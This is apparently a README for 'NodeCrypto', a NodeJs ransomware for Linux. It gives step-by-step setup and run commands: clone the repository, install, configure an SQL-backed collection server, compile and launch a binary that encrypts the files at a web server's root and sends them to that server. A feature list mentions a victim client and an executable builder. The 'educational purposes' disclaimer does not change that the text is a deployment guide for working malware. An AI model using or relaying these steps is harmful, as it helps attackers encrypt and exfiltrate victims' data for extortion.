NodeCrypto is a Linux Ransomware written in NodeJs that encrypt predefined files. This project was created for educational purposes, you are the sole responsible for the use of it.
- Upload all file of server/ folder on your webserver.
- Create a sql database and import sql/nodeCrypto.sql
- Edit server/libs/db.php and add your SQL ID.
Install & Run
git clone https://github.com/atmoner/nodeCrypto.git cd nodeCrypto && npm install cd sources && npm install cd .. && npm start
Once your configuration is complete, run compile!
You can start the ransomware.
cd sources && ./output
The files at the root of the web server will encrypt and send to the server.
- GUI exe creator
- Edit basic variable
- Export cross-plateform
- Client (victim)
- Encrypt webserver
- Use private key for encryption
- Adapt SSL
- Recover data (user + encrypted file)
- Format the database
- Make GUI for webserver
- Make an executable to decrypt the files
Powered by Froala Editor